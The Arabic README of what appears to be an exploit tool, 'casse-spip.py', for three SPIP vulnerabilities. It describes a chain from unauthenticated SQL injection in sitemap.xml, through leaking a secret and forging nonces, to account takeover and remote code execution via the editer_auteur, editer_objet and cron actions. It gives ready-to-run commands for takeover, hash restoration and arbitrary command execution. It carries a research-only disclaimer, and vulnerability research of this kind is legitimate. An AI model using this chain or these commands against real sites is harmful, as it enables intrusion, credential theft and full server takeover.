
سلسلة استغلال Python لثغرات SPIP CVEs 2026-72708/72709/72710، تربط حقن SQL غير المصادق عليه بالاستيلاء على الحساب وتنفيذ التعليمات البرمجية عن بُعد.
استغلال لـ CVE-2026-72708، وCVE-2026-72709 وCVE-2026-72710 التي اكتشفها Franck Chevalier (Wayko)
للاطلاع على تحليل تقني معمّق كامل، اقرأ المقال الكامل على مدونة Lexfo.
يُقدَّم هذا المستودع لأغراض البحث والأمن الدفاعي فقط. لا يتحمّل المؤلف أي مسؤولية عن إساءة استخدام هذه المعلومات.
نقطة الدخول هي حقن SQL في صفحة sitemap.xml العامة لتسريب alea_ephemere.
بهذا السر، يمكن تزوير nonces صالحة لإجراءات مجهولة الهوية.
يؤدي إجراءان إلى تنفيذ تعليمات برمجية عن بُعد (RCE) انطلاقًا من هناك:
action=editer_auteur الاستيلاء على الحساب، ثم RCE من المنطقة الخاصة.action=editer_objet الإسناد الجماعي (mass assignment)، لكتابة صف في قائمة انتظار spip_jobs، ثم تنفيذه عبر action=cron.python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"
قبل الكتابة فوق البيانات، يقوم --ato باستخراج login الخاص بالهدف وتجزئة pass الحالية
(عبر SQLi) حتى تتمكن من إعادتها لاحقًا باستخدام --restore-hash:
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"
سيتم كتابة الملف إلى IMG/casse-spip_<token>.html.